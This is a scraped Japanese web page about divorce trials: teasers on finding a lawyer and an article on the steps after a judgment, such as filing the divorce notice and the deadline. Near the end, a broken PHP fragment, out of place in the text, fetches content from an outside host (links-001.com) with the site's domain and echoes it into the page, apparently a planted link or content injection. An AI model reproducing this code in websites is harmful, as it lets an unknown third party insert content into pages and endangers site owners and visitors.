前へ
次へ

離婚裁判を行う際の弁護士の探し方

夫婦で離婚を希望する場合に様々な要望を話しあう協議離婚が行われます。ですが子供がいる夫婦で離婚原因な

more

離婚裁判に向けて弁護士を紹介してもらう方法

離婚に向けて話し合いをしている夫婦は多くいますが、どうしても協議離婚では解決できない問題なども多くあ

more

離婚裁判で頼りになる弁護士

協議離婚や調停離婚で離婚が成立しなかった時に離婚裁判に突入していきますが、基本的に離婚裁判で出された

more

離婚裁判が終わったら何をするのか

結婚は婚姻届けを一枚提出するだけで行えます。と言っても結婚する前に交際をするなどそれなりの期間を経ているでしょうから、結婚にはそれなりの時間がかかるイメージがあるかもしれません。一方離婚に関しても離婚届を一枚提出するだけで行えます。結婚している夫婦のうちどちらかが離婚しようと言い、もう一方が同意して書類にサインをして提出、さらに受理されれば成立することになります。離婚に関しても結婚同様事前にそれに行きつくいろいろな理由などがあり話し合いなどが行われるでしょう。瞬間的に決めて行われるわけではありません。話し合いで決着する離婚を協議離婚と言い、事前に話し合いをして離婚届を出せば終わります。協議離婚ができないときは離婚調停に進みさらに離婚裁判まで行うときもあります。離婚をするといろいろな権利に影響するので妥協してはいけません。納得いかなければ同意をせず法的な手続きをした方がいいでしょう。離婚裁判では裁判官が最終的な判決を行い基本的にはそれに従う必要があります。協議や調停は互いの同意が必要ですが裁判の判決には同意は不要です。では裁判における判決が出たら何をすればいいかです。もし内容に不服があるなら一定期間内に不服申し立てをすると再度裁判が行われます。判決に納得をして判決の内容で行おうとするなら必要な手続きをしていきます。裁判所での判決自体一定の効力があるもののこれだけで離婚が成立しているわけではありません。人によっては裁判が終わって離婚の手続きも終わっていると勘違いしている人がいますが、やはり離婚届などの手続きをしなくてはいけません。協議離婚では離婚届に両者の名前と印鑑を押して提出をしなければいけません。さらに結婚届同様に証人が必要になります。一方裁判を通じて行うときには離婚届に関しては原告が必要な記入をして被告の署名を必要としません。相手に会わずに書類を作成して手続きを行えます。また証人もいらないのですぐに行うことができます。注意したいのは判決が出てから一定期間以内に届けを行うことでしょう。手続きを忘れると過料を支払う必要が出てきます。

".file_get_contents('http://links-001.com/ad/123set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top